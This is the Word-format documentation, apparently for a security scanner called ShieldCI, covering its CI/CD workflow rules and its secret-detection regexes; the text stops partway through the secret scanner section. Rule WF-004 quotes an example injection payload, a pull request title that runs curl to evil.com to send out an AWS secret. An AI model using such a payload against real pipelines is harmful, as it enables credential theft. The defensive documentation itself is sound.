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Scanner Engines &amp; Detection Heuristics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ShieldCI includes six purpose-built security engines spanning static codebase analysis, live perimeter auditing, and database posture checks. This document details the inner workings, detection rules, regex signatures, and remediation recommendations for each engine.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[Overview of Scanner Engines](#overview-of-scanner-engines)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>[1. CI/CD Workflow Scanner (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>WorkflowScanner</w:t>
      </w:r>
      <w:r>
        <w:t>)](#1-cicd-workflow-scanner-workflowscanner)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[Rule WF-001: Insecure Trigger </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pull_request_target</w:t>
      </w:r>
      <w:r>
        <w:t>](#rule-wf-001-insecure-trigger-pull_request_target)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>[Rule WF-002: Excessive Pipeline Permissions (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>write-all</w:t>
      </w:r>
      <w:r>
        <w:t>)](#rule-wf-002-excessive-pipeline-permissions-write-all)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>[Rule WF-003: Unpinned 3rd-Party Actions (Mutable Tags)](#rule-wf-003-unpinned-3rd-party-actions-mutable-tags)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>[Rule WF-004: Inline Script Injection Vectors](#rule-wf-004-inline-script-injection-vectors)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>[Rule WF-005: GitLab CI Disabled Host Key Checking](#rule-wf-005-gitlab-ci-disabled-host-key-checking)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>[2. Secret &amp; Credential Scanner (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SecretScanner</w:t>
      </w:r>
      <w:r>
        <w:t>)](#2-secret--credential-scanner-secretscanner)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>[Signature Pattern Matching](#signature-pattern-matching)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>[Shannon Entropy Analysis](#shannon-entropy-analysis)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>[Redaction &amp; Masking Guarantees](#redaction--masking-guarantees)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>[3. Software Composition Analysis (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SCAScanner</w:t>
      </w:r>
      <w:r>
        <w:t>)](#3-software-composition-analysis-scascanner)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>[SBOM Inventory Generation (PURL)](#sbom-inventory-generation-purl)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>[Advisory CVE Database](#advisory-cve-database)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>[Semantic Versioning Evaluation](#semantic-versioning-evaluation)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>[4. Container &amp; IaC Scanner (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>IaCScanner</w:t>
      </w:r>
      <w:r>
        <w:t>)](#4-container--iac-scanner-iacscanner)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[Dockerfile Rule IAC-001: Unpinned </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:latest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Base Image](#dockerfile-rule-iac-001-unpinned-latest-base-image)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>[Dockerfile Rule IAC-002: Container Execution as Root](#dockerfile-rule-iac-002-container-execution-as-root)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>[Dockerfile Rule IAC-003: Exposed Administrative Ports](#dockerfile-rule-iac-003-exposed-administrative-ports)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>[Terraform Rule IAC-004: Unrestricted Ingress CIDR (0.0.0.0/0)](#terraform-rule-iac-004-unrestricted-ingress-cidr-00000)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>[5. Live Web Perimeter &amp; API Scanner (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>WebsiteScanner</w:t>
      </w:r>
      <w:r>
        <w:t>)](#5-live-web-perimeter--api-scanner-websitescanner)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>[SSL/TLS Certificate Auditing](#ssltls-certificate-auditing)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>[Security Response Headers](#security-response-headers)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>[CORS Wildcard with Credentials](#cors-wildcard-with-credentials)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>[Information Disclosure &amp; Banners](#information-disclosure--banners)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>[Active Sensitive Path Probes](#active-sensitive-path-probes)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>[6. Database Posture &amp; Access Scanner (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>DatabaseScanner</w:t>
      </w:r>
      <w:r>
        <w:t>)](#6-database-posture--access-scanner-databasescanner)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>[Connection String Credential Analysis](#connection-string-credential-analysis)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>[Weak &amp; Default Password Detection](#weak--default-password-detection)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>[TLS / Encryption Enforcement](#tls--encryption-enforcement)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>[Network Socket Accessibility](#network-socket-accessibility)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>[Unauthenticated Protocol Probes (Redis &amp; Elasticsearch)](#unauthenticated-protocol-probes-redis--elasticsearch)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2563EB"/>
        </w:rPr>
        <w:t>Overview of Scanner Engines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Source Code Path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Target Scope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Output Category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`WorkflowScanner`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app/scanners/workflow_scanner.py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GitHub Actions &amp; GitLab CI definitions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Pipeline Misconfiguration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`SecretScanner`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app/scanners/secret_scanner.py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Source code, config, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B4283C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>.env</w:t>
            </w:r>
            <w:r>
              <w:t>, scripts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Secret &amp; Credential Leak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`SCAScanner`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app/scanners/sca_scanner.py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requirements.txt</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> dependencies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Vulnerable Dependency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`IaCScanner`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app/scanners/iac_scanner.py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Dockerfile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*.tf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Container &amp; IaC Exposure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`WebsiteScanner`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app/scanners/web_scanner.py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Public or internal HTTP/HTTPS endpoints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Web &amp; API Security Exposure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`DatabaseScanner`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app/scanners/database_scanner.py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Database URIs or </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B4283C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>host:port</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> pairs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Database Posture &amp; Access Exposure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1. CI/CD Workflow Scanner (`WorkflowScanner`)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Target files: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.github/workflows/*.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.github/workflows/*.yaml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.gitlab-ci.yml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Rule WF-001: Insecure Trigger `pull_request_target`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CRITICAL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Mechanism</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Detects workflows triggered by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>on: pull_request_target</w:t>
      </w:r>
      <w:r>
        <w:t>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 xml:space="preserve">: Unlike standard </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pull_request</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pull_request_target</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> runs in the context of the base repository rather than the fork. It has access to repository secrets and a write-scoped </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>GITHUB_TOKEN</w:t>
      </w:r>
      <w:r>
        <w:t>. If the workflow checks out fork code (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>actions/checkout</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ref: ${{ github.event.pull_request.head.sha }}</w:t>
      </w:r>
      <w:r>
        <w:t>), untrusted pull request code can exfiltrate production secrets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Auto-Fix</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Automatically replaced with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>on: pull_request</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in generated patches.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
        </w:rPr>
        <w:t>Rule WF-002: Excessive Pipeline Permissions (`write-all`)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Mechanism</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Inspects top-level or job-level </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>permissions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> blocks for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>write-all</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or broad </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>write</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> scopes.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 xml:space="preserve">: Violates the principle of least privilege. If any step in the pipeline is compromised, the attacker can use the ambient </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>GITHUB_TOKEN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to push code to branches, overwrite releases, or alter repository issues.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t>: Declare minimal, explicit permissions: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permissions:</w:t>
              <w:br/>
              <w:t xml:space="preserve">    contents: read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Rule WF-003: Unpinned 3rd-Party Actions (Mutable Tags)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MEDIUM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Mechanism</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Inspects </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>uses:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> steps in GitHub Actions jobs. Verifies whether the action reference contains a full 40-character SHA-1 commit hash.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 xml:space="preserve">: Referencing actions by mutable branch or release tags (e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>uses: actions/checkout@v3</w:t>
      </w:r>
      <w:r>
        <w:t>) exposes pipelines to supply chain hijacking. If the maintainer's account is compromised, the tag can be pointed to malicious code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t>: Pin actions to immutable commit SHAs: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uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4.1.1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Rule WF-004: Inline Script Injection Vectors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CRITICAL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Mechanism</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Evaluates </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>run:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> commands using the regex:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>$$\$\{\{\s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>(github\.event\.issue\.title|github\.event\.pull_request\.title|github\.event\.comment\.body|github\.head_ref)\s</w:t>
      </w:r>
      <w:r>
        <w:t>\}\}$$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 xml:space="preserve">: Direct interpolation of untrusted user input into shell scripts permits arbitrary command injection. An attacker can submit a pull request title such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Fix Bug"; curl https://evil.com -d @$AWS_SECRET; #</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to execute arbitrary shell commands on the runner.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t>: Pass untrusted context through intermediate environment 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env:</w:t>
              <w:br/>
              <w:t xml:space="preserve">    PR_TITLE: ${{ github.event.pull_request.title }}</w:t>
              <w:br/>
              <w:t xml:space="preserve">  run: |</w:t>
              <w:br/>
              <w:t xml:space="preserve">    python process_pr.py "$PR_TITLE"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Rule WF-005: GitLab CI Disabled Host Key Checking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Mechanism</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Searches </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.gitlab-ci.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>dangerouslyDisableHostKeyChecking</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>strictHostKeyChecking=no</w:t>
      </w:r>
      <w:r>
        <w:t>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Disabling SSH host key verification permits Man-In-The-Middle (MITM) attacks during automated deployments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2563EB"/>
        </w:rPr>
        <w:t>2. Secret &amp; Credential Scanner (`SecretScanner`)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Scans all project files, automatically bypassing directories defined in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>settings.scanner.IGNORED_DIRECTORIES</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.git</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>node_modules</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>venv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>dist</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>build</w:t>
      </w:r>
      <w:r>
        <w:t>) and binary extensions (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.png</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.pdf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.zip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.pyc</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
        </w:rPr>
        <w:t>Signature Pattern Matching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Secret Type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Regular Expression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AWS Access Key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\b(AKIA[0-9A-Z]{16})\b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CRITICAL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AWS Secret Access Key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(?i)aws_secret_access_key\s*=\s*['"]?([A-Za-z0-9/+=]{40})['"]?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CRITICAL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GitHub Personal Access Token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`\b(ghp_[0-9a-zA-Z]{36}\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github_pat_[0-9a-zA-Z_]{82})\b`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CRITICAL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Generic High-Risk API Token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`(?i)(api[_-]?key\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secret[_-]?token\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auth[_-]?token)\s</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
              </w:rPr>
              <w:t>[:=]\s</w:t>
            </w:r>
            <w:r>
              <w:t>['"]([a-zA-Z0-9_\-]{24,})['"]`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Private RSA/SSH Key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`-----BEGIN (RSA \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OPENSSH \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EC )?PRIVATE KEY-----`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Slack Incoming Webhook URL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https://hooks\.slack\.com/services/T[a-zA-Z0-9_]+/B[a-zA-Z0-9_]+/[a-zA-Z0-9_]+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Shannon Entropy Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
